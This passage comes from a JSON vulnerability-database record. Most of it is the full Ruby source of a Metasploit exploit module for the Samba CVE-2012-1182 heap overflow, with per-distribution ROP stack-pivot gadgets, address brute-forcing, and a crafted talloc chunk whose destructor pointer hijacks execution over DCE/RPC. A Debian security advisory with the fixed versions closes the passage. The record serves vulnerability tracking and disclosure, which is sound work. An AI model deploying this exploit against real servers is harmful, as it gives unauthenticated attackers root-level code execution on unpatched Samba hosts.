2:3.5.4~dfsg-1ubuntu8',\n 'Stackpivot' => 0x0003e4bc, #xchg eax, esp ; ret in libgcrypt.so.11.5.3\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb694f000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6b4d000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Debian Squeeze / 2:3.5.6~dfsg-3squeeze6',\n 'Stackpivot' => 0x0003e30c, #xchg eax, esp ; ret in libgcrypt.so.11.5.3\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb6962000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6a61000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['3.5.10-0.107.el5 on CentOS 5',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => '3.5.10-0.107.el5 on CentOS 5',\n 'Stackpivot' => 0x0006ad7e, #xchg eax, esp ; xchg eax, ebx ; add eax, 0xCB313435 ; or ecx, eax ; ret in libgcrypt.so.11.5.2\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0x0037c000 },\n 'Stop' => { 'libgcrypt_base' => 0x09e73000 },\n 'Step' => 0x1000\n }\n }\n ]\n\n ],\n 'DisclosureDate' => '2012-04-10',\n 'DefaultTarget' => 0\n ))\n\n register_options([\n OptInt.new(\"StartBrute\", [ false, \"Start Address For Brute Forcing\" ]),\n OptInt.new(\"StopBrute\", [ false, \"Stop Address For Brute Forcing\" ])\n ])\n\n deregister_options('SMB::ProtocolVersion')\n end\n\n def exploit\n if target.bruteforce?\n bf = target.bruteforce\n\n if datastore['StartBrute'] and datastore['StartBrute'] > 0\n bf.start_addresses['libgcrypt_base'] = datastore['StartBrute']\n end\n\n if datastore['StopBrute'] and datastore['StopBrute'] > 0\n bf.stop_addresses['libgcrypt_base'] = datastore['StopBrute']\n end\n\n if bf.start_addresses['libgcrypt_base'] > bf.stop_addresses['libgcrypt_base']\n raise ArgumentError, \"StartBrute should not be larger than StopBrute\"\n end\n end\n super\n end\n\n def brute_exploit(target_addrs)\n print_status(\"Trying to exploit Samba with address 0x%.8x...\" % target_addrs['libgcrypt_base'])\n datastore['DCERPC::fake_bind_multi'] = false\n datastore['DCERPC::max_frag_size'] = 4248\n datastore['DCERPC::smb_pipeio'] = 'trans'\n datastore['DCERPC::ReadTimeout'] = 3\n\n pipe = \"lsarpc\"\n\n vprint_status('Use Rex client (SMB1 only) since this module is not compatible with RubySMB client')\n connect(versions: [1])\n smb_login()\n\n handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', [\"\\\\#{pipe}\"])\n dcerpc_bind(handle)\n dcerpc.socket.mode = 'rw'\n # revert for other exploits\n datastore['DCERPC::smb_pipeio'] = 'rw'\n\n cmd = \";;;;\" # padding\n helper = 0\n if target['Arch'] == ARCH_CMD\n cmd << \"#{payload.encoded}\\x00\" # system argument\n tmp = cmd * (816/cmd.length)\n tmp << \"\\x00\"*(816-tmp.length)\n ret_addr = addr\n elsif target['Arch'] == ARCH_X86\n cmd << generate_rop_payload('samba', payload.encoded,{'target'=>target['Ropname'], 'base'=> target_addrs['libgcrypt_base'] })\n tmp = cmd\n tmp << \"\\x00\"*(816-tmp.length)\n ret_addr = target_addrs['libgcrypt_base']+target['Stackpivot']\n # will help in stack pivot when it's not eax pointing to shellcode\n if target['Stackpivot_helper']\n helper = target_addrs['libgcrypt_base']+target['Stackpivot_helper']\n end\n end\n\n stub = \"X\" * 20\n\n stub << NDR.short(2) # level\n stub << NDR.short(2) # level 2\n stub << NDR.long(1) # auditing mode\n stub << NDR.long(1) # ptr\n stub << NDR.long(100000) # r-> count\n stub << NDR.long(20) # array size\n stub << NDR.long(0)\n stub << NDR.long(100)\n stub << rand_text_alpha(target['Offset'])\n # Crafted talloc chunk\n #stub << 'A' * 8 # next, prev\n stub << NDR.long(helper) + 'A'*4 # next, prev\n stub << NDR.long(0) + NDR.long(0) # parent, child\n stub << NDR.long(0) # refs\n #\t\tstub << NDR.long(target_addrs['Ret']) # destructor # will become EIP\n stub << NDR.long(ret_addr) # destructor # will become EIP\n stub << NDR.long(0) # name\n stub << \"AAAA\" # size\n stub << NDR.long(0xe8150c70) # flags\n stub << \"AAAABBBB\"\n stub << tmp # pointer to tmp+4 in $esp\n stub << rand_text(32632)\n stub << rand_text(62000)\n\n begin\n call(dcerpc, 0x08, stub)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError\n rescue Rex::Proto::DCERPC::Exceptions::Fault\n print_error('Server is most likely patched...')\n rescue Timeout::Error\n print_status(\"Timeout\")\n rescue Rex::Proto::SMB::Exceptions::LoginError\n print_status(\"Rex::Proto::SMB::Exceptions::LoginError\")\n rescue => e\n if e.to_s =~ /STATUS_PIPE_DISCONNECTED/\n print_status('Server disconnected, this is expected')\n end\n end\n handler()\n disconnect()\n end\n\n def check\n begin\n vprint_status('Connect with SMB1 for the check method, since it needs native_lm info')\n connect(versions: [1])\n smb_login()\n disconnect()\n\n version = smb_peer_lm().scan(/Samba (\\d\\.\\d.\\d*)/).flatten[0]\n minor = version.scan(/\\.(\\d*)$/).flatten[0].to_i\n vprint_status(\"Version found: #{version}\")\n\n return Exploit::CheckCode::Appears if version =~ /^3\\.4/ and minor < 16\n return Exploit::CheckCode::Appears if version =~ /^3\\.5/ and minor < 14\n return Exploit::CheckCode::Appears if version =~ /^3\\.6/ and minor < 4\n\n return Exploit::CheckCode::Safe\n\n rescue ::Exception\n return CheckCode::Unknown\n end\n end\n\n # Perform a DCE/RPC Function Call\n def call(dcerpc, function, data, do_recv = true)\n\n frag_size = data.length\n if dcerpc.options['frag_size']\n frag_size = dcerpc.options['frag_size']\n end\n object_id = ''\n if dcerpc.options['object_call']\n object_id = dcerpc.handle.uuid[0]\n end\n if options['random_object_id']\n object_id = Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))\n end\n\n call_packets = make_request(function, data, frag_size, dcerpc.context, object_id)\n call_packets.each { |packet|\n write(dcerpc, packet)\n }\n\n return true if not do_recv\n\n raw_response = ''\n\n begin\n raw_response = dcerpc.read()\n rescue ::EOFError\n raise Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n if (raw_response == nil or raw_response.length == 0)\n raise Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n\n dcerpc.last_response = Rex::Proto::DCERPC::Response.new(raw_response)\n\n if dcerpc.last_response.type == 3\n e = Rex::Proto::DCERPC::Exceptions::Fault.new\n e.fault = dcerpc.last_response.status\n raise e\n end\n\n dcerpc.last_response.stub_data\n end\n\n # Used to create standard DCERPC REQUEST packet(s)\n def make_request(opnum=0, data=\"\", size=data.length, ctx=0, object_id = '')\n\n opnum = opnum.to_i\n size = size.to_i\n ctx = ctx.to_i\n\n chunks, frags = [], []\n ptr = 0\n\n # Break the request into fragments of 'size' bytes\n while ptr < data.length\n chunks.push( data[ ptr, size ] )\n ptr += size\n end\n\n # Process requests with no stub data\n if chunks.length == 0\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, '', ctx, object_id) )\n return frags\n end\n\n # Process requests with only one fragment\n if chunks.length == 1\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, chunks[0], ctx, object_id) )\n return frags\n end\n\n # Create the first fragment of the request\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(1, opnum, chunks.shift, ctx, object_id) )\n\n # Create all of the middle fragments\n while chunks.length != 1\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(0, opnum, chunks.shift, ctx, object_id) )\n end\n\n # Create the last fragment of the request\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(2, opnum, chunks.shift, ctx, object_id) )\n\n return frags\n end\n\n # Write data to the underlying socket\n def write(dcerpc, data)\n dcerpc.socket.write(data)\n data.length\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/samba/setinfopolicy_heap.rb"}], "debian": [{"lastseen": "2020-11-11T13:16:10", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2450-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nApril 12, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : samba\nVulnerability : privilege escalation\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-1182\nDebian Bug : 668309\n\nIt was discovered that Samba, the SMB/CIFS file, print, and login server,\ncontained a flaw in the remote procedure call (RPC) code which allowed\nremote code execution as the super user from an unauthenticated\nconnection.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:3.6.4-1.\n\nWe recommend that you upgrade your samba packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2012-04-12T20:30:03", "published": "2012-04-12T20:30:03", "id": "DEBIAN:DSA-2450-1:77F45", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00080.html", "title": "[SECURITY] [DSA 2450-1] samba security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}